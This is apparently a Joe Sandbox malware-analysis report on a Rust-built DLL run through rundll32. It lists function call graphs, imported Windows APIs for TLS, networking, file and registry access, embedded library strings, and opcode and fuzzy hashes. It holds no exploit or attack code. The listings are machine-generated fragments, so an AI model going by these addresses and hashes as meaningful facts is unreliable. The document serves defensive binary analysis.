82311->82317 82320 6cbab7b5 82311->82320 82379 6cbf0060 26 API calls 82314->82379 82325 6cbab7c5 82317->82325 82385 6cbf69ca 45 API calls 82317->82385 82318 6cbab692 82366 6cbefdd0 30 API calls __aulldiv 82318->82366 82319->82263 82319->82264 82320->82325 82373 6cbf6472 45 API calls 82320->82373 82323 6cbabcd5 82395 6cb8408b RtlFreeHeap 82323->82395 82329 6cb65ad0 RtlFreeHeap 82325->82329 82327 6cbab69e 82367 6cbf0060 26 API calls 82327->82367 82329->82332 82330 6cbab994 82330->82281 82333 6cbab9ac 82330->82333 82331 6cbab6ba 82368 6cbf8d1f 45 API calls 82331->82368 82386 6cb95841 WakeByAddressSingle 82332->82386 82380 6cb95841 WakeByAddressSingle 82333->82380 82337 6cbabcf1 82396 6cb67b7d RtlFreeHeap 82337->82396 82338 6cbab9b8 82381 6cbc7cec 27 API calls 82338->82381 82341 6cbabcfc 82347 6cbabd4d 82341->82347 82397 6cb75bde RtlFreeHeap 82341->82397 82343->82253 82343->82256 82343->82260 82350 6cbabac9 82343->82350 82344 6cbabd0e 82398 6cb979b6 RtlFreeHeap 82344->82398 82346 6cbabd8d 82401 6cb97ab5 RtlFreeHeap WakeByAddressSingle WaitOnAddress GetLastError 82346->82401 82347->82346 82400 6cb7f185 RtlFreeHeap 82347->82400 82349 6cbabdd3 memmove 82349->82350 82351 6cbabe03 82349->82351 82403 6cbc3b60 RtlFreeHeap 82351->82403 82354 6cbabd16 82399 6cb67b7d RtlFreeHeap 82354->82399 82356 6cbabd94 82356->82349 82402 6cb99f82 RtlFreeHeap 82356->82402 82407 6cbca3bf 82358->82407 82360->82250 82361->82270 82362->82276 82363->82284 82364->82303 82365->82318 82366->82327 82367->82331 82368->82319 82369->82272 82370->82287 82371->82292 82372->82311 82373->82325 82374->82279 82375->82288 82376->82299 82377->82305 82378->82314 82379->82330 82380->82338 82381->82272 82382->82298 82383->82281 82384->82272 82385->82325 82386->82343 82387->82260 82388->82262 82389->82277 82390->82291 82391->82297 82392->82310 82393->82309 82394->82323 82395->82337 82396->82341 82397->82344 82398->82354 82399->82347 82400->82346 82401->82356 82402->82349 82403->82350 82484 6cb7e54a WaitOnAddress GetLastError 82407->82484 82409 6cbca3d1 82410 6cbca3ff 82409->82410 82411 6cbca3f8 82409->82411 82420 6cbcc000 82409->82420 82487 6cb947fc WakeByAddressSingle 82410->82487 82486 6cb947fc WakeByAddressSingle 82411->82486 82412 6cc024e0 26 API calls 82412->82420 82415 6cbca40a 82482 6cbca3fd 82415->82482 82488 6cbcfbc0 27 API calls 82415->82488 82417 6cba7771 52 API calls 82417->82482 82418 6cb7e54a WaitOnAddress GetLastError 82418->82482 82419 6cb87584 2 API calls 82419->82482 82420->82412 82421 6cbcbf55 82421->82420 82422 6cbcbb85 82421->82422 82423 6cbcbc10 82421->82423 82501 6cb947fc WakeByAddressSingle 82422->82501 82424 6cbcbf30 82423->82424 82503 6cb7e263 26 API calls 82423->82503 82427 6cbcbdf9 82502 6cb947fc WakeByAddressSingle 82427->82502 82431 6cbc7048 52 API calls 82431->82482 82432 6cb947fc WakeByAddressSingle 82432->82482 82433 6cbcc0f9 82504 6cc024e0 26 API calls 82433->82504 82435 6cbcc11c 82485 6cc025b0 26 API calls 82435->82485 82437 6cb764aa 26 API calls 82437->82482 82438 6cb775ac 26 API calls 82438->82482 82443 6cb77553 26 API calls 82443->82482 82445 6cbc70c8 26 API calls 82445->82482 82458 6cbcb1c2 memmove 82496 6cb760ad 26 API calls 82458->82496 82464 6cbd3dac 29 API calls 82464->82482 82471 6cb76423 26 API calls 82471->82482 82474 6cbcb694 memmove 82474->82482 82475 6cbd3fa7 29 API calls 82475->82482 82477 6cb79f53 26 API calls 82477->82482 82479 6cbcb765 memmove 82479->82482 82480 6cbcb8ad memmove 82500 6cbc70c8 26 API calls 82480->82500 82482->82417 82482->82418 82482->82419 82482->82420 82482->82421 82482->82422 82482->82423 82482->82431 82482->82432 82482->82433 82482->82435 82482->82437 82482->82438 82482->82443 82482->82445 82482->82458 82482->82464 82482->82471 82482->82474 82482->82475 82482->82477 82482->82480 82483 6cbd3f5a 26 API calls 82482->82483 82489 6cbd9c46 26 API calls 82482->82489 82490 6cb7679b 26 API calls 82482->82490 82491 6cbcfbc0 27 API calls 82482->82491 82492 6cb766e8 26 API calls 82482->82492 82493 6cb7bbab 26 API calls 82482->82493 82494 6cb769c0 26 API calls 82482->82494 82495 6cbcf406 29 API calls 82482->82495 82497 6cb7ee67 RtlFreeHeap 82482->82497 82498 6cb7b813 26 API calls 82482->82498 82499 6cb775ac 26 API calls 82482->82499 82483->82482 82484->82409 82486->82482 82487->82415 82488->82482 82489->82482 82490->82482 82491->82482 82492->82482 82493->82482 82494->82482 82495->82482 82496->82482 82497->82482 82498->82474 82499->82479 82501->82427 82502->82423 82503->82424
                        APIs
                        • memmove.VCRUNTIME140(?,?,000000C0), ref: 6CBB4875
                        • memmove.VCRUNTIME140(?,?,00000098), ref: 6CBB4886
                        • memmove.VCRUNTIME140(?,?,00000098), ref: 6CBB49AB
                        • memmove.VCRUNTIME140(?,?,00000148), ref: 6CBB49DF
                        • memmove.VCRUNTIME140(?,?,00000148), ref: 6CBB49F7
                        • memmove.VCRUNTIME140(?,?,00000098), ref: 6CBB4A3A
                        • memmove.VCRUNTIME140(?,?,00000188), ref: 6CBB4A7C
                        • memmove.VCRUNTIME140(?,?,00000029), ref: 6CBB4C4B
                        Strings
                        • Flatten polled after completionD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-util-0.3.31\src\future\future\flatten.rs, xrefs: 6CBB77E9
                        • P, xrefs: 6CBB5FC1
                        • internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs, xrefs: 6CBB7801, 6CBB7861
                        • U9W{, xrefs: 6CBB52AE
                        • authority implies host, xrefs: 6CBB78AD
                        • domain is valid Uri, xrefs: 6CBB7849
                        • uri host is valid header value, xrefs: 6CBB7895
                        • Map must not be polled after it returned `Poll::Ready`, xrefs: 6CBB77D7
                        • cannot poll Select twice, xrefs: 6CBB4981
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove
                        • String ID: Flatten polled after completionD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-util-0.3.31\src\future\future\flatten.rs$Map must not be polled after it returned `Poll::Ready`$P$U9W{$authority implies host$cannot poll Select twice$domain is valid Uri$internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs$uri host is valid header value
                        • API String ID: 2162964266-2968858985
                        • Opcode ID: 1c8ac67fdcb28dbdc3cf5a16c58a62947c4aaad29a282b39ec5479f911fe833e
                        • Instruction ID: 15118a772302be5bfb0d80b9cfd212e14862bb31fd9ab198a6512eab54f810c8
                        • Opcode Fuzzy Hash: 1c8ac67fdcb28dbdc3cf5a16c58a62947c4aaad29a282b39ec5479f911fe833e
                        • Instruction Fuzzy Hash: 1A537D71908B858FD725CF24C480BABB7E1FF89314F04896DE8896F751DB70A949CB92
                        APIs
                        • CertFreeCertificateContext.CRYPT32(?), ref: 6CBD6EDA
                        • CertFreeCertificateContext.CRYPT32 ref: 6CBD6EDD
                        • CertGetCertificateChain.CRYPT32(00000000,?,00000000,00000000,?,C0000001,00000000,00000000), ref: 6CBD6F7F
                        • CertFreeCertificateContext.CRYPT32 ref: 6CBD7026
                        • CertFreeCertificateContext.CRYPT32 ref: 6CBD7049
                        • GetLastError.KERNEL32 ref: 6CBD705F
                        • CertFreeCertificateContext.CRYPT32 ref: 6CBD7091
                        • CertFreeCertificateChain.CRYPT32(?), ref: 6CBD70CA
                        • CertVerifyCertificateChainPolicy.CRYPT32(00000004,?,?,00000010), ref: 6CBD7144
                        • CertFreeCertificateContext.CRYPT32(?), ref: 6CBD7247
                        • AcceptSecurityContext.SECUR32(?,?,?,0001011C,00000000,?,?,?,00000000), ref: 6CBD743A
                        • InitializeSecurityContextW.SECUR32(?,?,00000000,0009819C,00000000,00000000,?,00000000,00000000,?,?,00000000), ref: 6CBD74A9
                        • FreeContextBuffer.SECUR32(?), ref: 6CBD74C1
                        • FreeContextBuffer.SECUR32(00000000), ref: 6CBD7565
                        • FreeContextBuffer.SECUR32(?), ref: 6CBD75F6
                        • CertFreeCertificateChain.CRYPT32(?), ref: 6CBD76F2
                        • CertFreeCertificateContext.CRYPT32(?), ref: 6CBD76FD
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: ContextFree$CertCertificate$Chain$Buffer$Security$AcceptErrorInitializeLastPolicyVerify
                        • String ID: P(Hu$unexpected EOF during handshakeassertion failed: size >= nread
                        • API String ID: 619209709-78324864
                        • Opcode ID: 1018c51b172c0cd98dfe7590fa1ab78d884bd742a8888cff22b2f4033e02285c
                        • Instruction ID: eb7dc16b3352f9c72ee06c848200096f7ab937d85626dfb3200b39d20755c40f
                        • Opcode Fuzzy Hash: 1018c51b172c0cd98dfe7590fa1ab78d884bd742a8888cff22b2f4033e02285c
                        • Instruction Fuzzy Hash: 256278706087819FD314CF24C040B9ABBF1FF89718F11891DE8999B791DBB5E889CB92
                        APIs
                        • memmove.VCRUNTIME140(?,?,00000098), ref: 6CBA8586
                        • memmove.VCRUNTIME140(?,?,00000088), ref: 6CBA860E
                        • memmove.VCRUNTIME140(?,?,00000088,?), ref: 6CBA8CD6
                        • memset.VCRUNTIME140(?,000000FF,?), ref: 6CBA8DF7
                          • Part of subcall function 6CB65AD0: RtlFreeHeap.NTDLL(00000000,?,6CBE7E44), ref: 6CB65AE1
                        • memmove.VCRUNTIME140(?,?,00000088), ref: 6CBA94CF
                        • memmove.VCRUNTIME140(?,00000000,00000090), ref: 6CBA99D5
                        • memmove.VCRUNTIME140(?,?,00000090), ref: 6CBA9ADA
                        • memmove.VCRUNTIME140(?,?,000000F0), ref: 6CBA9B83
                        • memmove.VCRUNTIME140(?,?,00000138), ref: 6CBAAC2B
                        • memmove.VCRUNTIME140(?,?,00000108), ref: 6CBAAC48
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove$FreeHeapmemset
                        • String ID: C$C$Map must not be polled after it returned `Poll::Ready`$called `Result::unwrap()` on an `Err` value$connection error$internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs$keep-aliveHTTP/1.1 100 Continueinternal error: entered unreachable code: poll_read_body invalid state: $send stream capacity unexpectedly closedD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\io\util\write_all.rs
                        • API String ID: 217009222-2210599076
                        • Opcode ID: 7916cce1a3a54726b43afe406e86c79df06a540622a1d7fb20fd7e5fa06acb58
                        • Instruction ID: 75ab1d8ff13d6c57d60e9fb416a4e4b98ef219a9e3a1f801338ac2824ac334ed
                        • Opcode Fuzzy Hash: 7916cce1a3a54726b43afe406e86c79df06a540622a1d7fb20fd7e5fa06acb58
                        • Instruction Fuzzy Hash: 25434271A087C18BD771CF24C4907AEB7E1FF89308F10891ED8D99B651DB71A98ACB52
                        APIs
                        • memmove.VCRUNTIME140(00000000,?,00000150), ref: 6CBBB39A
                        • memmove.VCRUNTIME140(?,00000000,00000094,?,6CC53F94,6CC53FDC), ref: 6CBBB585
                        • memmove.VCRUNTIME140(?,?,00000094,?,?,?,?,6CC53F94,6CC53FDC), ref: 6CBBB5B2
                        • memmove.VCRUNTIME140(?,?,00000094,?,?,?,?,?,?,?,6CC53F94,6CC53FDC), ref: 6CBBB5DC
                        Strings
                        • , xrefs: 6CBBB1A2
                        • internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs, xrefs: 6CBC2743, 6CBC2767
                        • ALPN upgraded to HTTP/2, xrefs: 6CBBB805
                        • called `Result::unwrap()` on an `Err` value, xrefs: 6CBC2905
                        • TryFlatten polled after completionD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-util-0.3.31\src\future\try_future\try_flatten.rs, xrefs: 6CBC2779
                        • Map must not be polled after it returned `Poll::Ready`, xrefs: 6CBC2755
                        • assertion failed: DEFAULT_MAX_FRAME_SIZE <= val && val <= MAX_MAX_FRAME_SIZED:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\h2-0.3.26\src\frame\settings.rs, xrefs: 6CBC27AC
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove
                        • String ID: $ALPN upgraded to HTTP/2$Map must not be polled after it returned `Poll::Ready`$TryFlatten polled after completionD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-util-0.3.31\src\future\try_future\try_flatten.rs$assertion failed: DEFAULT_MAX_FRAME_SIZE <= val && val <= MAX_MAX_FRAME_SIZED:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\h2-0.3.26\src\frame\settings.rs$called `Result::unwrap()` on an `Err` value$internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs
                        • API String ID: 2162964266-4189558408
                        • Opcode ID: 0d1c5e980e6dc163dbc8161d64a2d4e598beb155e6b5c47e1b480f73cac3002c
                        • Instruction ID: 3fc8a4574f48982dc6a0cd7daa3dc692a9e4552244394365cb4bd43f1f82b68e
                        • Opcode Fuzzy Hash: 0d1c5e980e6dc163dbc8161d64a2d4e598beb155e6b5c47e1b480f73cac3002c
                        • Instruction Fuzzy Hash: 6F928B75A087818FC325CF28C4907EEBBE5BFC9314F148A2EE5999B781DB709945CB42
                        APIs
                          • Part of subcall function 6CBF9BE5: CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000,?,?,00000001,?,6CBD9DB2), ref: 6CBF9C14
                        • memmove.VCRUNTIME140(00000000,?,00000138), ref: 6CBDA3D9
                        • memmove.VCRUNTIME140(?,?,00000138), ref: 6CBDA567
                        • memmove.VCRUNTIME140(00000004,?,00000158), ref: 6CBDA606
                        Strings
                        • =, xrefs: 6CBD9D6F
                        • failed to park thread, xrefs: 6CBDB9EA
                        • Failed to `Enter::block_on`, xrefs: 6CBDB953
                        • cannot access a Thread Local Storage value during or after destruction/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\std\src\thread\local.rs, xrefs: 6CBDBA20, 6CBDBA94
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove$CompletionCreatePort
                        • String ID: =$Failed to `Enter::block_on`$cannot access a Thread Local Storage value during or after destruction/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\std\src\thread\local.rs$failed to park thread
                        • API String ID: 613624600-1090645739
                        • Opcode ID: e09b0f4eb41d58c2b3dc6e354a41106e4355f729d7b9bf06bf1ec07e41138e03
                        • Instruction ID: cc13fcd34f8fe375b6139250175a6efc3ebec04369370fc7e25e5b63251c7bce
                        • Opcode Fuzzy Hash: e09b0f4eb41d58c2b3dc6e354a41106e4355f729d7b9bf06bf1ec07e41138e03
                        • Instruction Fuzzy Hash: 890399706087818FD725CF24C4907AEB7F1FF89318F15896DD8998BB51DB70A94ACB82
                        APIs
                        • memmove.VCRUNTIME140(?,?,000000D0), ref: 6CBC90FF
                        • memmove.VCRUNTIME140(00000003,?,00000098), ref: 6CBC946E
                        Strings
                        • ., xrefs: 6CBC94F1
                        • Pending error polled more than once, xrefs: 6CBC9143
                        • cookie2too many redirectsassertion failed: slot.is_none()D:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-channel-0.3.31\src\oneshot.rs, xrefs: 6CBC9ADA
                        • L, xrefs: 6CBC9B3C
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove
                        • String ID: .$L$Pending error polled more than once$cookie2too many redirectsassertion failed: slot.is_none()D:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-channel-0.3.31\src\oneshot.rs
                        • API String ID: 2162964266-3828590624
                        • Opcode ID: 7e6b250001b3bde59011bad69919fd355e2f7e1a105ddaf7f2c63221d4f2c470
                        • Instruction ID: 3756ae880d544472cf06046a4ddb8848625cc9c526c24533aee26c198e893fe6
                        • Opcode Fuzzy Hash: 7e6b250001b3bde59011bad69919fd355e2f7e1a105ddaf7f2c63221d4f2c470
                        • Instruction Fuzzy Hash: 49B28F716087819BD725CF24C490BEEB7E1FFC5318F14892DE8999B781DB71A84ACB42
                        APIs
                        • memmove.VCRUNTIME140(?,reqwest-internal-sync-runtimecore thread exited early,0000001D), ref: 6CB61681
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove
                        • String ID: */*$reqwest-internal-sync-runtimecore thread exited early$QK$$\
                        • API String ID: 2162964266-1477125959
                        • Opcode ID: 84966a6fce5570dc1ddc0bdd28a37f68b55373ec17c7799eabfb40fb71a6f677
                        • Instruction ID: 8b9e6c4ac0c63d79d9300dbc201ad1721f505e6c5e31f49079314320a6d11b82
                        • Opcode Fuzzy Hash: 84966a6fce5570dc1ddc0bdd28a37f68b55373ec17c7799eabfb40fb71a6f677
                        • Instruction Fuzzy Hash: B36268719087818FD325CF25C444BEAB7F0FF89315F098AAED9899B752DB709489CB42
                        APIs
                        • NtCreateFile.NTDLL ref: 6CB94879
                        • RtlNtStatusToDosError.NTDLL ref: 6CB94884
                        • CreateIoCompletionPort.KERNELBASE(?,?,00000000,00000000), ref: 6CB948FB
                        • SetFileCompletionNotificationModes.KERNEL32(?,00000002), ref: 6CB9490B
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: CompletionCreateFile$ErrorModesNotificationPortStatus
                        • String ID:
                        • API String ID: 986160054-0
                        • Opcode ID: 478e6c2bbb96f0331a2dcace435df283c1b019acd306bc0ee3fbfe04528d6ffc
                        • Instruction ID: ede6a645959ae8ac2f8558995ea2ef7f1a4c9a50e49d96f9acfa1461f0f09b6f
                        • Opcode Fuzzy Hash: 478e6c2bbb96f0331a2dcace435df283c1b019acd306bc0ee3fbfe04528d6ffc
                        • Instruction Fuzzy Hash: A041DBB1244385EFE7009F29C841B1ABBF0FB06719F14892DE2A9CB682C775E881CF55
                        APIs
                        • NtDeviceIoControlFile.NTDLL ref: 6CB943F2
                        • RtlNtStatusToDosError.NTDLL ref: 6CB94404
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: ControlDeviceErrorFileStatus
                        • String ID: called `Result::unwrap()` on an `Err` value
                        • API String ID: 2674770877-2333694755
                        • Opcode ID: af9e24778652fac913e56ab91853004251e1874c63bd5070237abb4d9a51807b
                        • Instruction ID: b31dd14bafe8d0cc6fc41ebe94f2a6ad88baefed7a985331cbc1f672557a1778
                        • Opcode Fuzzy Hash: af9e24778652fac913e56ab91853004251e1874c63bd5070237abb4d9a51807b
                        • Instruction Fuzzy Hash: 47D1AE706083818FCB04CF18C49065EB7E1FF8A308F14896DE9A99BB95DB70E955CF82
                        APIs
                        • recv.WS2_32(?,?,?,00000000), ref: 6CBF8593
                        • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CBF85A0
                        Strings
                        • filled overflowfilled must not become larger than initialized, xrefs: 6CBF8700
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: ErrorLastrecv
                        • String ID: filled overflowfilled must not become larger than initialized
                        • API String ID: 2514157807-3814584485
                        • Opcode ID: 36d973166f2b73ef237d79afd9989bd00327b29266cf272984ff1faea3e999d0
                        • Instruction ID: d11e35ec64b786447c0c30c333a7300ccb5696503172a0c61054bda0b40c53c4
                        • Opcode Fuzzy Hash: 36d973166f2b73ef237d79afd9989bd00327b29266cf272984ff1faea3e999d0
                        • Instruction Fuzzy Hash: 99615BB1609380AFC704CF15C48464EBBE1AF8A314F548A1EF5A98B791D772D84ACB87
                        APIs
                        • RegOpenKeyExW.KERNELBASE(80000001,?,00000000,00020019,?), ref: 6CBB1CD5
                          • Part of subcall function 6CBAC93D: RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,?,?,?,00000000,?,?,6CBB1D27,6CC558B1), ref: 6CBAC99B
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: OpenQueryValue
                        • String ID:
                        • API String ID: 4153817207-0
                        • Opcode ID: 4f53f99867cab5e8837b96adcb3e7fdbce91b6c726d4ee2b675e2eba02ae9653
                        • Instruction ID: d16312c3fb9b7389a3f839fcb14a2757a4058abf8ba83aa9a2b12c46b9348f9c
                        • Opcode Fuzzy Hash: 4f53f99867cab5e8837b96adcb3e7fdbce91b6c726d4ee2b675e2eba02ae9653
                        • Instruction Fuzzy Hash: B752AD716487819FD324CF14C4917AFB7E1EF89354F148A2DE889AB690DB70D949CB83
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: ErrorLastbind
                        • String ID:
                        • API String ID: 2328862993-0
                        • Opcode ID: e0fa55e645f903c8f3a858772cbf0017633c23c114716afa830657e715d3ad85
                        • Instruction ID: 2dcb405ab6ec8f4649e8ede17e905487353d114f89079087472295b2311a45d0
                        • Opcode Fuzzy Hash: e0fa55e645f903c8f3a858772cbf0017633c23c114716afa830657e715d3ad85
                        • Instruction Fuzzy Hash: 25D05E71204291AFE7205F68D404BA67AECAF0A768F1548ADE4C4D6642EBB588848B71
                        APIs
                        • memmove.VCRUNTIME140(?,?,00000098), ref: 6CBBA02F
                        • memmove.VCRUNTIME140(?,?,00000098), ref: 6CBBA06A
                        • memmove.VCRUNTIME140(?,?,00000098), ref: 6CBBA0C3
                        • memmove.VCRUNTIME140(?,?,00000098), ref: 6CBBA12D
                        • memmove.VCRUNTIME140(?,?,00000098), ref: 6CBBA175
